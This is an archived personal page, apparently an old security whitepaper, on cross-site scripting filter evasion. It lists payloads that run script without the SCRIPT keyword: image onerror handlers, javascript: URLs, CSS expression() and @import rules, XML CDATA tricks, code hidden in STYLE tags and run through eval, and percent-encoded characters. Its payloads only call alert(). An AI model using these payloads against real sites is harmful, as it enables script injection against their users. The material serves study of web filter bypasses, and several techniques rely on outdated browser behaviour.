Www.edup.tudelft.nl/~bjwever/whitepaper xss2.html.php
From Skypher
← Back to www.edup.tudelft.nl/~bjwever/This information is copied from my old webpage @ http://www.edup.tudelft.nl/~bjwever. Some or all of it may be outdated and incorrect. The only thing close to any guarantee that I can give about the contents of this page is that is very likely to be chuck-full of spelling errors.
Contents |
Encoding scripts to bypass filters (script spoofing)
The Credits
I got the idear of encoding scripts and (especially using CSS tags) from Andrew Clover who posted it on the bugtraq list at the SecurityFocus website.
The '@import' came from Georgi Guninski who used it to fool hotmail into executing JScript.
The XML generation of HTML came from GreyMagic Software who used it to auto-execute any local file using the OBJECT tag flaw in IE.
How to execute scripts
Here are some examples how to execute script in not to commonly known ways. These come in handy when keywords like SCRIPT are filtered out:
Using JavaScript "on*" events.
<IMG width="0" height="0" onerror="alert();" src="::">
(Use "onError" on a picture that doesn't exist, else use "onLoad")
Using "javascript:" urls.
<META http-equiv="refresh" content="0;url=javascript:alert();"> <IMG width="0" height="0" src="javascript:alert();"> <LINK rel="stylesheet" href="javascript:alert();"> <IFRAME width="0" height="0" src="javascript:alert();" ></IFRAME>
Using Cascading StyleSheets rules.
<STYLE type="text/css">
@import url(javascript:alert());
body { background: url(javascript:alert()); }
body { width: expression(alert()); }
</STYLE>
<IMG width="0" height="0" style="width: expression(alert());">
<IMG width="0" height="0" style="background: url(javascript:alert());">
Using XML to generate HTML with <![CDATA[ ]]>.
<SPAN datasrc="#xml" datafld="XML2" dataformatas="html"></SPAN>
<XML id="xml"><XML1><XML2>
<![CDATA[<]]>SCRIPT<![CDATA[>]]>
alert();
<![CDATA[<]]>/SCRIPT<! [CDATA[>]]>
</XML2></XML1></XML>
(This will result in the SPANs innerHTML becoming '<SCRIPT>alert();</SCRIPT>').
The examples above that use a url to execute scripts all use 'javascript:alert();' but this can be replaced with 'about:<script>alert();</script>' in most cases.
Hiding big chunks of code
If you are able to execute one script command, you can execute as many as you want; simply put your script code inside any tag like DIV, SPAN, P, etc. and use 'eval(tag_containing_jscript.innerHTML)' to execute it.
The STYLE tag is ideal since the innerHTML does not get displayed. Tags like DIV, SPAN, P, etc... need something like style="visibility:hidden"; if they are to go undetected by eye.
<STYLE id="jscript"> alert(); //...more JScript... </STYLE > <IMG width="0" height="0" src="javascript:eval(jscript.innerHTML)">
To execute the code with a tag, use one of the following:
eval(code) setTimeout(code, 1); setInterval(code, 1); window.execScript(code, "javascript");
Characters filter circumvention:
Sometimes it's not possible to insert certain characters or words, unicode encoding of characters offers help here:
<IMG src="javascript:%61%6C%65%72%74%28%29%3B">
The src property above decodes to 'javascript:alert();'.
My shellcode encoder Beta can also be used to encode scripts in this manner.
Links
- XSS Whitepaper: SQL-Injection, HTML injection and Cross-site scripting.
- Beta shellcode encoder: Documentation.
- beta.c C Source file for the current version of beta shellcode encoder.
